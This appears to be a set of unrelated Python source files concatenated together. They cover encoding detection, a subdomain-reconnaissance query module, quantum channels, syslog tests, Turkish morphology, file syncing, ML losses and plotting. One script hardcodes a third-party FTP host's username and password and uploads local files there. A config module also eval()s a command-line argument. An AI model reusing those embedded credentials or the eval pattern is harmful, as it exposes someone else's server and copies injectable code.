el.alphabets,
el.bom,
el.percent_chaos,
el.percent_coherence,
None,
False
)
)
if args.normalize is True:
if p_.encoding.startswith('utf') is True:
print('"{}" file does not need to be normalized, as it already came from unicode.'.format(my_file.name), file=sys.stderr)
if my_file.closed is False:
my_file.close()
continue
o_ = my_file.name.split('.') # type: list[str]
if args.replace is False:
o_.insert(-1, p_.encoding)
if my_file.closed is False:
my_file.close()
else:
if args.force is False and query_yes_no(
'Are you sure to normalize "{}" by replacing it ?'.format(my_file.name), 'no') is False:
if my_file.closed is False:
my_file.close()
continue
try:
x_[0].unicode_path = './{}'.format('.'.join(o_))
with open(x_[0].unicode_path, 'w', encoding='utf-8') as fp:
fp.write(
str(p_)
)
except IOError as e:
print(str(e), file=sys.stderr)
if my_file.closed is False:
my_file.close()
return 2
if my_file.closed is False:
my_file.close()
if args.minimal is False:
print(
dumps(
[
el.__dict__ for el in x_
] if args.alternatives else x_[0].__dict__,
ensure_ascii=True,
indent=4
)
)
else:
print(
', '.join(
[
el.encoding for el in x_
]
)
)
return 0
if __name__ == '__main__':
cli_detect()
|
1689942
|
from app.thirdparty.oneforall.config import settings
from app.thirdparty.oneforall.common.query import Query
class ChinazAPI(Query):
def __init__(self, domain):
Query.__init__(self)
self.domain = domain
self.module = 'Dataset'
self.source = 'ChinazAPIQuery'
self.addr = 'https://apidata.chinaz.com/CallAPI/Alexa'
self.api = settings.chinaz_api
def query(self):
"""
向接口查询子域并做子域匹配
"""
self.header = self.get_header()
self.proxy = self.get_proxy(self.source)
params = {'key': self.api, 'domainName': self.domain}
resp = self.get(self.addr, params)
self.subdomains = self.collect_subdomains(resp)
def run(self):
"""
类执行入口
"""
if not self.have_api(self.api):
return
self.begin()
self.query()
self.finish()
self.save_json()
self.gen_result()
self.save_db()
def run(domain):
"""
类统一调用入口
:param str domain: 域名
"""
query = ChinazAPI(domain)
query.run()
if __name__ == '__main__':
run('example.com')
|
1689959
|
import ftplib
import sys
import os
import argparse
def get_arg_parser():
parser = argparse.ArgumentParser(
description="Upload to ftp server",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("file_path", nargs='?', default="/data/test.txt",
help="Path to the file")
return parser
def cd_dir_and_auto_create(ftp, currentDir):
if currentDir != "":
try:
ftp.cwd(currentDir)
except:
cd_dir_and_auto_create(ftp, "/".join(currentDir.split("/")[:-1]))
ftp.mkd(currentDir)
ftp.cwd(currentDir)
def upload_to_ftp(dongle_id, key, file_path):
#print('ftp: {}, {}, {}'.format(dongle_id, key, file_path))
ftp = ftplib.FTP("kevo.live")
ftp.login("openpilot", "openpilotdf")
with open(file_path, 'rb') as f:
remote_dir = os.path.join('/Home', dongle_id, os.path.dirname(key))
cd_dir_and_auto_create(ftp, remote_dir)
ftp.storbinary('STOR ' + os.path.basename(file_path), f)
ftp.quit()
if __name__ == "__main__":
args = get_arg_parser().parse_args(sys.argv[1:])
upload_to_ftp('dongle_id', 'logname/fcamera.hevc', '/data/test.txt')
|
1690017
|
from typing import Any, Dict, Iterable, Tuple, Union
import numpy as np
from cirq import linalg, protocols, value
from cirq._compat import proper_repr
from cirq.ops import raw_types
class MixedUnitaryChannel(raw_types.Gate):
"""A generic mixture that can record the index of its selected operator.
This type of object is also referred to as a mixed-unitary channel.
Args:
mixture: a list of (probability, qubit unitary) pairs
key: an optional measurement key string for this mixture. Simulations
which select a single unitary to apply will store the index
of that unitary in the measurement result list with this key.
validate: if True, validate that `mixture` describes a valid mixture.
This validation can be slow; prefer pre-validating if possible.
"""
def __init__(
self,
mixture: Iterable[Tuple[float, np.ndarray]],
key: Union[str, value.MeasurementKey, None] = None,
validate: bool = False,
):
mixture = list(mixture)
if not mixture:
raise ValueError('MixedUnitaryChannel must have at least one unitary.')
if not protocols.approx_eq(sum(p[0] for p in mixture), 1):
raise ValueError('Unitary probabilities must sum to 1.')
m0 = mixture[0][1]
num_qubits = np.log2(m0.shape[0])
if not num_qubits.is_integer() or m0.shape[1] != m0.shape[0]:
raise ValueError(
f'Input mixture of shape {m0.shape} does not '
'represent a square operator over qubits.'
)
self._num_qubits = int(num_qubits)
for i, op in enumerate(p[1] for p in mixture):
if not op.shape == m0.shape:
raise ValueError(
f'Inconsistent unitary shapes: op[0]: {m0.shape}, op[{i}]: {op.shape}'
)
if validate and not linalg.is_unitary(op):
raise ValueError(f'Element {i} of mixture is non-unitary.')
self._mixture = mixture
if not isinstance(key, value.MeasurementKey) and key is not None:
key = value.MeasurementKey(key)
self._key = key
@staticmethod
def from_mixture(
mixture: 'protocols.SupportsMixture', key: Union[str, value.MeasurementKey, None] = None
):
"""Creates a copy of a mixture with the given measurement key."""
return MixedUnitaryChannel(mixture=list(protocols.mixture(mixture)), key=key)
def __eq__(self, other) -> bool:
if not isinstance(other, MixedUnitaryChannel):
return NotImplemented
if self._key != other._key:
return False
if not np.allclose(
[m[0] for m in self._mixture],
[m[0] for m in other._mixture],
):
return False
return np.allclose(
[m[1] for m in self._mixture],
[m[1] for m in other._mixture],
)
def num_qubits(self) -> int:
return self._num_qubits
def _mixture_(self):
return self._mixture
def _measurement_key_name_(self) -> str:
if self._key is None:
return NotImplemented
return str(self._key)
def _measurement_key_obj_(self) -> value.MeasurementKey:
if self._key is None:
return NotImplemented
return self._key
def _with_measurement_key_mapping_(self, key_map: Dict[str, str]):
if self._key is None:
return NotImplemented
if self._key not in key_map:
return self
return MixedUnitaryChannel(mixture=self._mixture, key=key_map[str(self._key)])
def _with_key_path_(self, path: Tuple[str, ...]):
return MixedUnitaryChannel(
mixture=self._mixture, key=protocols.with_key_path(self._key, path)
)
def __str__(self):
if self._key is not None:
return f'MixedUnitaryChannel({self._mixture}, key={self._key})'
return f'MixedUnitaryChannel({self._mixture})'
def __repr__(self):
unitary_tuples = [
'(' + repr(op[0]) + ', ' + proper_repr(op[1]) + ')' for op in self._mixture
]
args = [f'mixture=[{", ".join(unitary_tuples)}]']
if self._key is not None:
args.append(f'key=\'{self._key}\'')
return f'cirq.MixedUnitaryChannel({", ".join(args)})'
def _json_dict_(self) -> Dict[str, Any]:
return protocols.obj_to_dict_helper(self, ['_mixture', '_key'])
@classmethod
def _from_json_dict_(cls, _mixture, _key, **kwargs):
mix_pairs = [(m[0], np.asarray(m[1])) for m in _mixture]
return cls(mixture=mix_pairs, key=_key)
|
1690056
|
def import_class(module_name, class_name):
"""
Import a class given the specified module name and class name.
"""
klass = __import__(module_name)
class_segments = class_name.split(".")
for segment in class_segments:
klass = getattr(klass, segment)
return klass
|
1690095
|
from prefix import *
from chaperone.cutil.syslog import _syslog_spec_matcher
SPECS = (
('*.*', '(True)'),
('[crond].*', '((g and "crond" == g.lower()))'),
('.*', 'Invalid log spec syntax: .*'),
('kern.*;kern.!=crit', '((not (f==0) or not p==2)) and (((f==0)))'),
('KERN.*;kern.!crit', '((not (f==0) or not p<=2)) and (((f==0)))'),
('kern.crit', '((f==0) and p<=2)'),
('*.=emerg;*.=crit', '(p==0) or (p==2)'),
('/not and\/or able/.*', '(bool(s._regexes[0].search(buf)))'),
('*.*;![debian-start].*;authpriv,auth.!*', '(not ((g and "debian-start" == g.lower())) and (not (f==10 or f==4)))'),
('*.*;![debian-start].*;!authpriv,auth.*', '(not ((g and "debian-start" == g.lower())) and not ((f==10 or f==4)))'),
('*.*;![debian-start].*;!authpriv,auth.!crit', '(not ((g and "debian-start" == g.lower())) and (not (f==10 or f==4) and not p<=2))'),
('kern.*', '((f==0))'),
('*.*;*.!*', '((False))'),
('*.*;![chaperone].*', '(not ((g and "chaperone" == g.lower())))'),
('kern.*;!auth,authpriv.*', '(not ((f==4 or f==10))) and (((f==0)))'),
('[cron].*;[daemon-tools].crit;/password/.!err', '((not bool(s._regexes[0].search(buf)) or not p<=3)) and (((g and "cron" == g.lower())) or ((g and "daemon-tools" == g.lower()) and p<=2))'),
('kern.*;![cron].!err', '((not (g and "cron" == g.lower()) and not p<=3)) and (((f==0)))'),
('[chaperone].err;[logrotate].err;!kern.*', '(not ((f==0))) and (((g and "chaperone" == g.lower()) and p<=3) or ((g and "logrotate" == g.lower()) and p<=3))'),
('/panic/.*;/segfault/.*;*.!=debug', '((not p==7)) and ((bool(s._regexes[0].search(buf))) or (bool(s._regexes[1].search(buf))))'),
)
class TestSyslogSpec(unittest.TestCase):
def test_specs(self):
for s in SPECS:
try:
sm = _syslog_spec_matcher(s[0]).debugexpr
except Exception as ex:
sm = ex
if 'unexpected' in str(sm):
raise
#Uncomment to generate the test table, but CHECK IT carefully!
#print("('{0:40} '{1}'),".format(s[0]+"',", sm))
self.assertEqual(str(sm), s[1])
if __name__ == '__main__':
unittest.main()
|
1690129
|
from enum import Enum, auto
from zemberek.core.turkish import PrimaryPos, SecondaryPos, RootAttribute, TurkishAlphabet, Turkish
from zemberek.morphology.analysis.single_analysis import SingleAnalysis
class WordAnalysisSurfaceFormatter:
ALPHABET = TurkishAlphabet.INSTANCE
def format_(self, analysis: SingleAnalysis, apostrophe: str) -> str:
item = analysis.item
ending = analysis.get_ending()
if apostrophe is None and not self.apostrophe_required(analysis):
return item.normalized_lemma() + ending if RootAttribute.NoQuote in item.attributes else \
analysis.get_stem() + ending
else:
if apostrophe is None:
apostrophe = "'"
return item.normalized_lemma() + apostrophe + ending if len(ending) > 0 else item.normalized_lemma()
def format_to_case(self, analysis: SingleAnalysis, type_: 'WordAnalysisSurfaceFormatter.CaseType',
apostrophe: str) -> str:
formatted = self.format_(analysis, apostrophe)
if type_ == WordAnalysisSurfaceFormatter.CaseType.DEFAULT_CASE:
return formatted
if type_ == WordAnalysisSurfaceFormatter.CaseType.LOWER_CASE:
return formatted.translate(self.ALPHABET.lower_map).lower()
if type_ == WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE:
return formatted.translate(self.ALPHABET.upper_map).upper()
if type_ == WordAnalysisSurfaceFormatter.CaseType.TITLE_CASE:
return Turkish.capitalize(formatted)
if type_ == WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE_ROOT_LOWER_CASE_ENDING:
ending = analysis.get_ending()
lemma_upper = analysis.item.normalized_lemma().translate(self.ALPHABET.upper_map).upper()
if len(ending) == 0:
return lemma_upper
else:
if apostrophe is None and not self.apostrophe_required(analysis):
return lemma_upper + ending
if apostrophe is None:
apostrophe = "'"
return lemma_upper + apostrophe + ending
return ""
@staticmethod
def apostrophe_required(analysis: SingleAnalysis) -> bool:
item = analysis.item
return (item.secondary_pos == SecondaryPos.ProperNoun and RootAttribute.NoQuote not in item.attributes) \
or (item.primary_pos == PrimaryPos.Numeral and item.has_attribute(RootAttribute.Runtime)) \
or item.secondary_pos == SecondaryPos.Date
def guess_case(self, inp: str) -> 'WordAnalysisSurfaceFormatter.CaseType':
first_letter_upper_case = False
lower_case_count = 0
upper_case_count = 0
letter_count = 0
for apostrophe_index, c in enumerate(inp):
if c.isalpha():
if apostrophe_index == 0:
first_letter_upper_case = c.isupper()
if first_letter_upper_case:
upper_case_count += 1
else:
lower_case_count += 1
elif c.isupper():
upper_case_count += 1
elif c.islower():
lower_case_count += 1
letter_count += 1
if letter_count == 0:
return WordAnalysisSurfaceFormatter.CaseType.DEFAULT_CASE
elif letter_count == lower_case_count:
return WordAnalysisSurfaceFormatter.CaseType.LOWER_CASE
elif letter_count == upper_case_count:
return WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE
elif first_letter_upper_case and letter_count == lower_case_count + 1:
return WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE if letter_count == 1 else \
WordAnalysisSurfaceFormatter.CaseType.TITLE_CASE
else:
apostrophe_index = inp.find(chr(39)) # chr(39) = "'"
if 0 < apostrophe_index < len(inp) - 1 and self.guess_case(inp[0:apostrophe_index]) == \
WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE and self.guess_case(inp[apostrophe_index + 1:]) == \
WordAnalysisSurfaceFormatter.CaseType.LOWER_CASE:
return WordAnalysisSurfaceFormatter.CaseType.UPPER_CASE_ROOT_LOWER_CASE_ENDING
else:
return WordAnalysisSurfaceFormatter.CaseType.MIXED_CASE
class CaseType(Enum):
DEFAULT_CASE = auto()
LOWER_CASE = auto()
UPPER_CASE = auto()
TITLE_CASE = auto()
UPPER_CASE_ROOT_LOWER_CASE_ENDING = auto()
MIXED_CASE = auto()
|
1690175
|
import sublime
import json
import codecs
import os
is_sublime_text_3 = int(sublime.version()) >= 3000
if is_sublime_text_3:
from .settings import Settings
else:
from settings import Settings
class ProcessCache():
_procs = []
last_task_name = None
@classmethod
def get_from_storage(cls):
return cls.storage().read() or []
@classmethod
def get(cls):
return cls._procs[:]
@classmethod
def refresh(cls):
def remove_dead(process):
if not process.is_alive():
cls.remove(process)
cls.each(remove_dead)
@classmethod
def add(cls, process):
cls.last_task_name = process.get_task_name()
if process not in cls._procs:
cls._procs.append(process)
process = process.to_json()
cls.storage().update(lambda procs: procs + [process] if process not in procs else procs)
@classmethod
def remove(cls, process):
if process in cls._procs:
cls._procs.remove(process)
cls.storage().update(lambda procs: [proc for proc in procs if proc['pid'] != process.pid])
@classmethod
def kill_all(cls):
cls.each(lambda process: process.kill())
cls.clear()
@classmethod
def each(cls, fn):
for process in cls.get():
fn(process)
@classmethod
def empty(cls):
return len(cls._procs) == 0
@classmethod
def clear(cls):
del cls._procs[:]
cls.storage().write([])
@classmethod
def storage(cls):
if Settings.get_from_shared_data("track_processes", True):
return CacheFile(Settings.package_path())
else:
return Cache()
class Cache():
def exists(self):
pass
def remove(self):
pass
def open(self, mode="r"):
pass
def read(self):
pass
def write(self, data):
pass
def update(self, fn):
pass
class CacheFile(Cache):
def __init__(self, working_dir):
self.working_dir = working_dir
self.cache_path = os.path.join(self.working_dir, Settings.CACHE_FILE_NAME)
def exists(self):
return os.path.exists(self.cache_path)
def remove(self):
return os.remove(self.cache_path)
def open(self, mode="r"):
return codecs.open(self.cache_path, mode, "utf-8", errors='replace')
def read(self):
data = None
cache_file = self.open()
try:
data = json.load(cache_file)
except ValueError:
data = []
finally:
cache_file.close()
return data
def write(self, data):
cache_file = self.open("w")
try:
json_data = json.dumps(data, ensure_ascii=False)
if not json_data:
json_data = '[]'
cache_file.write(json_data)
finally:
cache_file.close()
def update(self, fn):
cache_file = codecs.open(self.cache_path, "r+", "utf-8", errors='replace')
current_data = None
try:
current_data = json.load(cache_file)
except ValueError:
current_data = []
try:
cache_file.seek(0)
new_data = fn(current_data)
cache_file.write(json.dumps(new_data))
cache_file.truncate()
finally:
cache_file.close()
|
1690185
|
import os
from ._base import DirSyncTestCase
from . import trees
from dirsync import sync
class SimpleTests(DirSyncTestCase):
init_trees = (('src', trees.simple),)
def test_simple_exclude(self):
sync('src', 'dst',
'sync',
create=True,
exclude=('^dir.*$',
'^.*\.py$'))
self.assertNotExists('dst/file2.py')
self.assertNotExists('dst/dir')
def test_exclude_include(self):
sync('src', 'dst',
'sync',
create=True,
exclude=('^.*\.py$',),
include=('^file2\.py$',))
self.assertExists('dst/file2.py')
def test_exclude_include_ignore(self):
sync('src', 'dst',
'sync',
create=True,
exclude=('^.*\.py$',),
ignore=('^.*\.txt$',),
include=('^file2\.py$',))
self.assertNotExists('dst/file1.txt')
self.assertNotExists('dst/dir/file4.txt')
def test_only(self):
sync('src', 'dst',
'sync',
create=True,
only=('^.*\.py$',))
self.assertNotExists('dst/file1.txt')
self.assertExists('dst/file2.py')
self.assertNotExists('dst/dir/file4.txt')
self.assertNotExists('dst/dir')
class SimpleTestsWithDst(DirSyncTestCase):
init_trees = (('src', trees.simple),)
def setUp(self):
super(SimpleTestsWithDst, self).setUp()
sync('src', 'dst', 'sync', create=True)
def test_ignore_file_rm_dir(self):
self.rm('src/file1.txt')
sync('src', 'dst', 'sync',
ignore=('file1.txt',))
self.assertNotExists('src/file1.txt')
self.assertExists('dst/file1.txt')
def test_ignore_dir(self):
self.rm('src/dir')
sync('src', 'dst', 'sync',
ignore=('dir',))
self.assertNotExists('src/dir')
self.assertExists('dst/dir')
class PyprojTests(DirSyncTestCase):
init_trees = (('src', trees.pyproj),)
def test_real_life(self):
sync('src', 'dst',
'sync',
purge=True,
create=True,
ctime=False,
exclude=(r'.*\.pyc',
r'^fab.*\.py$',
# any dir or file name starting with _ or .
r'^(?:.*[\\/])?[_.][^_].*$',
r'(?i).*/thumbs.db'),
ignore=(r'^settings/local.py$',
r'^static/.*\.css$',
r'^.*\.min.js$'),
include=(r'^_buildout/parts.cfg',)
)
self.assertNotExists('dst/.hg')
self.assertNotExists('dst/.hiddendir')
self.assertNotExists('dst/_ignoredir')
self.assertExists('dst/_buildout/parts.cfg')
self.assertExists('dst/cpnts/base/__init__.py')
self.assertNotExists('dst/cpnts/base/__init__.pyc')
self.assertExists('dst/cpnts/app/__init__.py')
self.assertNotExists('dst/cpnts/app/__init__.pyc')
self.assertNotExists('dst/settings/local.py')
self.assertExists('dst/settings/local.py.sample')
self.assertNotExists('dst/static/_scss')
self.assertExists('dst/static/css')
self.assertNotExists('dst/static/css/file.css')
self.assertExists('dst/static/img')
self.assertNotExists('dst/static/img/Thumbs.db')
self.assertExists('dst/static/js/file.js')
self.assertNotExists('dst/static/js/file.min.js')
self.assertNotExists('fabfile.py')
self.assertNotExists('fabfile.pyc')
|
1690189
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import numpy as np
from models.losses import FocalLoss, RegL1Loss, RegLoss, RegWeightedL1Loss, BinRotLoss, AutoShape_Position_loss, RegWeightedL1Loss2
from models.utils import _sigmoid
from .base_trainer import BaseTrainer
class AutoShapeLoss(torch.nn.Module):
def __init__(self, opt):
super(AutoShapeLoss, self).__init__()
self.crit = FocalLoss()
self.crit_hm_hp = torch.nn.MSELoss() if opt.mse_loss else FocalLoss()
self.crit_kp = RegWeightedL1Loss() if not opt.dense_hp else \
torch.nn.L1Loss(reduction='sum')
self.crit_p3d = RegWeightedL1Loss2()
self.crit_reg = RegL1Loss() if opt.reg_loss == 'l1' else \
RegLoss() if opt.reg_loss == 'sl1' else None
self.crit_rot = BinRotLoss()
self.opt = opt
is_kitti = False
if 'kitti' in opt.dataset: is_kitti = True
self.position_loss = AutoShape_Position_loss(opt, is_kitti)
def forward(self, outputs, batch, phase=None):
opt = self.opt
hm_loss, wh_loss, off_loss = 0, 0, 0
hp_loss, off_loss, hm_hp_loss, hp_offset_loss = 0, 0, 0, 0
dim_loss, rot_loss, prob_loss = 0, 0, 0
p3d_loss = 0
coor_loss =0
box_score=0
output = outputs[0]
output['hm'] = _sigmoid(output['hm'])
if opt.hm_hp and not opt.mse_loss:
output['hm_hp'] = _sigmoid(output['hm_hp'])
hm_loss = self.crit(output['hm'], batch['hm'])
hp_loss = self.crit_kp(output['hps'],batch['hps_mask'], batch['ind'], batch['hps'],batch['dep'])
if opt.wh_weight > 0:
wh_loss = self.crit_reg(output['wh'], batch['reg_mask'],batch['ind'], batch['wh'])
if opt.dim_weight > 0:
dim_loss = self.crit_reg(output['dim'], batch['reg_mask'],batch['ind'], batch['dim'])
p3d_loss += self.crit_reg(output['p3d'], batch['reg_mask'],
batch['ind'], batch['p3d'])
if opt.rot_weight > 0:
rot_loss = self.crit_rot(output['rot'], batch['rot_mask'], batch['ind'], batch['rotbin'], batch['rotres'])
if opt.reg_offset and opt.off_weight > 0:
off_loss = self.crit_reg(output['reg'], batch['reg_mask'], batch['ind'], batch['reg'])
if opt.reg_hp_offset and opt.off_weight > 0:
hp_offset_loss = self.crit_reg(output['hp_offset'], batch['hp_mask'], batch['hp_ind'], batch['hp_offset'])
if opt.hm_hp and opt.hm_hp_weight > 0:
hm_hp_loss = self.crit_hm_hp(output['hm_hp'], batch['hm_hp'])
coor_loss, prob_loss, box_score = self.position_loss(output, batch,phase)
loss_stats = {'loss': box_score, 'hm_loss': hm_loss, 'hp_loss': hp_loss,
'hm_hp_loss': hm_hp_loss, 'hp_offset_loss': hp_offset_loss,
'wh_loss': wh_loss, 'off_loss': off_loss, 'dim_loss': dim_loss,
'rot_loss': rot_loss, 'prob_loss': prob_loss, 'box_score': box_score, 'coor_loss': coor_loss,
'p3d_loss': p3d_loss
}
return loss_stats, loss_stats
class AutoShapeTrainer(BaseTrainer):
def __init__(self, opt, model, optimizer=None):
super(AutoShapeTrainer, self).__init__(opt, model, optimizer=optimizer)
def _get_losses(self, opt):
loss_states = ['loss', 'hm_loss', 'hp_loss', 'hm_hp_loss',
'hp_offset_loss', 'wh_loss', 'off_loss', 'dim_loss', 'rot_loss', 'prob_loss', 'coor_loss',
'box_score',
'p3d_loss'
]
loss = AutoShapeLoss(opt)
return loss_states, loss
def debug(self, batch, output, iter_id):
pass
def save_result(self, output, batch, results):
pass
|
1690206
|
import argparse
def annotate_enhancer_promoter_loops(
left_enhancers, right_enhancers, left_promoters, right_promoters):
"""
Split loops into anchors.
"""
loops = {}
left_coords = {}
right_coords = {}
# Left enhancers
with open(left_enhancers, 'r') as f:
for line in f:
entry = line.strip().split()
id = entry[3]
loops[id] = {}
loops[id]['left'] = ['E']
left_coords[id] = [entry[0], entry[1], entry[2]]
# Right enhancers
with open(right_enhancers, 'r') as f:
for line in f:
entry = line.strip().split()
id = entry[3]
if id in loops:
loops[id]['right'] = ['E']
else:
loops[id] = {}
loops[id]['right'] = ['E']
right_coords[id] = [
entry[0], entry[1], entry[2], entry[4], entry[5]]
# Left promoters
with open(left_promoters, 'r') as f:
for line in f:
entry = line.strip().split()
id = entry[3]
if id in loops:
if 'left' in loops[id]:
loops[id]['left'].append('P')
else:
loops[id]['left'] = ['P']
else:
loops[id] = {}
loops[id]['left'] = ['P']
left_coords[id] = [entry[0], entry[1], entry[2]]
# Right promoters
with open(right_promoters, 'r') as f:
for line in f:
entry = line.strip().split()
id = entry[3]
if id in loops:
if 'right' in loops[id]:
loops[id]['right'].append('P')
else:
loops[id]['right'] = ['P']
else:
loops[id] = {}
loops[id]['right'] = ['P']
right_coords[id] = [
entry[0], entry[1], entry[2], entry[4], entry[5]]
# Write results
out_file = left_enhancers.replace(
'.left_anchors.enhancers', '.enhancer_promoter')
with open(out_file, 'w') as out:
for id in sorted(loops.keys()):
if 'left' not in loops[id] or 'right' not in loops[id]:
continue
if 'P' in loops[id]['left'] and 'P' in loops[id]['right']:
annot = 'PP'
elif 'E' in loops[id]['left'] and 'P' in loops[id]['right']:
annot = 'EP'
elif 'P' in loops[id]['left'] and 'E' in loops[id]['right']:
annot = 'PE'
else:
continue
res = left_coords[id] + right_coords[id] + [annot]
out.write('\t'.join(res) + '\n')
def parse_command_line_args():
"""
Parse command-line arguments.
Returns:
args (class 'argparse.Namespace'):
An object containing the parsed command-line arguments.
For every command-line option, the values are stored as follows:
args.{option}
"""
# Initiate the argument parser
parser = argparse.ArgumentParser()
required = parser.add_argument_group('required arguments')
# Indicate the required arguments
required.add_argument(
'-a', '--left_enhancers', required=True,
help=('Left anchors overlapping enhancers.'))
required.add_argument(
'-b', '--right_enhancers', required=True,
help=('Right anchors overlapping enhancers.'))
required.add_argument(
'-c', '--left_promoters', required=True,
help=('Left anchors overlapping promoters.'))
required.add_argument(
'-d', '--right_promoters', required=True,
help=('Right anchors overlapping promoters.'))
# Parse the arguments from the command-line input
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_command_line_args()
annotate_enhancer_promoter_loops(
args.left_enhancers,
args.right_enhancers,
args.left_promoters,
args.right_promoters)
|
1690217
|
import numpy as np
# import PIL.Image
import matplotlib.pyplot as plt
import matplotlib.cm as cm
# lowest = -1.0
lowest = 0.0
highest = 1.0
# --------------------------------------
# Color maps ([-1,1] -> [0,1]^3)
# --------------------------------------
def heatmap(x):
x = x[..., np.newaxis]
# positive relevance
hrp = 0.9 - np.clip(x-0.3, 0, 0.7)/0.7*0.5
hgp = 0.9 - np.clip(x-0.0, 0, 0.3)/0.3*0.5 - np.clip(x-0.3, 0, 0.7)/0.7*0.4
hbp = 0.9 - np.clip(x-0.0, 0, 0.3)/0.3*0.5 - np.clip(x-0.3, 0, 0.7)/0.7*0.4
# negative relevance
hrn = 0.9 - np.clip(-x-0.0, 0, 0.3)/0.3*0.5 - np.clip(-x-0.3, 0, 0.7)/0.7*0.4
hgn = 0.9 - np.clip(-x-0.0, 0, 0.3)/0.3*0.5 - np.clip(-x-0.3, 0, 0.7)/0.7*0.4
hbn = 0.9 - np.clip(-x-0.3, 0, 0.7)/0.7*0.5
r = hrp*(x >= 0)+hrn*(x < 0)
g = hgp*(x >= 0)+hgn*(x < 0)
b = hbp*(x >= 0)+hbn*(x < 0)
return np.concatenate([r, g, b], axis=-1)
def graymap(x):
x = x[..., np.newaxis]
return np.concatenate([x, x, x], axis=-1)*0.5+0.5
# --------------------------------------
# Visualizing data
# --------------------------------------
# def visualize(x,colormap,name):
#
# N = len(x)
# assert(N <= 16)
#
# x = colormap(x/np.abs(x).max())
#
# # Create a mosaic and upsample
# x = x.reshape([1, N, 29, 29, 3])
# x = np.pad(x, ((0, 0), (0, 0), (2, 2), (2, 2), (0, 0)), 'constant', constant_values=1)
# x = x.transpose([0, 2, 1, 3, 4]).reshape([1*33, N*33, 3])
# x = np.kron(x, np.ones([2, 2, 1]))
#
# PIL.Image.fromarray((x*255).astype('byte'), 'RGB').save(name)
def plt_vector(x, colormap, num_headers):
N = len(x)
assert (N <= 16)
len_x = 54
len_y = num_headers
# size = int(np.ceil(np.sqrt(len(x[0]))))
length = len_y*len_x
data = np.zeros((N, length), dtype=np.float64)
data[:, :x.shape[1]] = x
data = colormap(data / np.abs(data).max())
# data = data.reshape([1, N, size, size, 3])
data = data.reshape([1, N, len_y, len_x, 3])
# data = np.pad(data, ((0, 0), (0, 0), (2, 2), (2, 2), (0, 0)), 'constant', constant_values=1)
data = data.transpose([0, 2, 1, 3, 4]).reshape([1 * (len_y), N * (len_x), 3])
return data
# data = np.kron(data, np.ones([2, 2, 1])) # scales
def add_subplot(data, num_plots, plot_index, title, figure):
fig = figure
ax = fig.add_subplot(num_plots, 1, plot_index)
cax = ax.imshow(data, interpolation='nearest', aspect='auto')
# cbar = fig.colorbar(cax, ticks=[0, 1])
# cbar.ax.set_yticklabels(['0', '> 1']) # vertically oriented colorbar
ax.set_title(title)
def plot_data(data, title):
plt.figure(figsize=(6.4, 2.5)) # figuresize to make 16 headers plot look good
# plt.axis('scaled')
plt.imshow(data, interpolation='nearest', aspect='auto')
plt.title(title)
plt.tight_layout()
def plotNNFilter(units):
filters = units.shape[3]
plt.figure(1, figsize=(20, 20))
n_columns = 6
n_rows = np.ceil(filters / n_columns) + 1
for i in range(filters):
plt.subplot(n_rows, n_columns, i+1)
plt.title('Filter ' + str(i))
plt.imshow(units[0, :, :, i], interpolation="nearest", cmap="gray")
|
1690253
|
import opencv
#this is important for capturing/displaying images
from opencv import highgui
import pygame
import sys
camera = highgui.cvCreateCameraCapture(0)
def get_image():
im = highgui.cvQueryFrame(camera)
# Add the line below if you need it (Ubuntu 8.04+)
im = opencv.cvGetMat(im)
#convert Ipl image to PIL image
return opencv.adaptors.Ipl2PIL(im)
fps = 30.0
pygame.init()
window = pygame.display.set_mode((640,480))
pygame.display.set_caption("Demo")
screen = pygame.display.get_surface()
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT or event.type == pygame.KEYDOWN:
sys.exit(0)
im = get_image()
pg_img = pygame.image.frombuffer(im.tostring(), im.size, im.mode)
screen.blit(pg_img, (0,0))
pygame.display.flip()
pygame.time.delay(int(1000 * 1.0/fps))
|
1690281
|
from __future__ import division
from options import get_parsed_commandline_options
from data_3d import WaveFront
# from data_3d import *
from modes import *
from file_utils import *
from modes.manipulate_results_data import *
import logging
from service import GracefulShutdown
# ======================================================================
# --- Parameterised config update
# ======================================================================
PARSE_OPTIONS,PARSE_ARGS = get_parsed_commandline_options()
class App:
#@todo: Refactor the globals in this module into the 'App' class in 'config.py'.
pass
# Program's Config
SELECT_BEST_LEDS = True if PARSE_OPTIONS.EVALUATION == 1 else False
#TODO:-- Bug due to mutable state reused for multiple purposes (toggle_test_evaluation_mode() function), replacing with PARSE_OPTIONS.EVALUATION == 1.
# -- Solution: Repurpose this module as DEMO MODE ONLY. Move all evaluations to another model and module. Move argument parsing to the MAIN.
QTY_OF_BEST_LEDS_REQUIRED = PARSE_OPTIONS.LEDS_QTY
default_QTY_OF_BEST_LEDS_REQUIRED = lambda: PARSE_OPTIONS.LEDS_QTY
TARGET_SHAPE = PARSE_OPTIONS.TARGET_SHAPE # None
TARGET_SCALE = PARSE_OPTIONS.TARGET_SCALE # 0.01
TARGET_TRANSLATION = eval(PARSE_OPTIONS.TARGET_TRANSLATION) # (0,-3,0)
# Display Configuration for Scoring
USE_SHADING_SCORE = True if PARSE_OPTIONS.DISPLAY_EVALUATION_METRIC_OPTION == 1 else False
USE_COVERAGE_SCORE = not USE_SHADING_SCORE
SCORE_DESCRIPTION = "Intensity Score" if USE_SHADING_SCORE else "Coverage Error"
CSV_METRIC_COLUMN_INDEX = 1 if USE_SHADING_SCORE else 3
# Extra Detailed Program Configs:
DO_EVALUATIONS = True
DRAW_REFLECTION_RAY = True
DRAW_INCIDENT_RAY = True
DRAW_CAMERA_REFLECTION_RAY = True
scale = property_to_number(section="FrameModel", key="frame.scale", vmin=1, vmax=20, vtype=float)
scale = scale if scale is not None else 8
TARGET_ROTATIONS = 6
TARGET_ROTATION_AXIS = (0,1,0)
TARGET_ROTATION_DEGREES=(360/TARGET_ROTATIONS)
# Camera Configuration:
camera_layout = CameraLayout_RealisticBias( scale ) if PARSE_OPTIONS.CAMERA_LAYOUT == 1 else CameraLayout_EvenBias( scale ) #cameraVertices = camera_layout.getCameraPositions() # cameraPos = camera_layout.getDefaultCameraPos()
#CAMERA_POSITION_DESCRIPTION = camera_layout.getDescription()
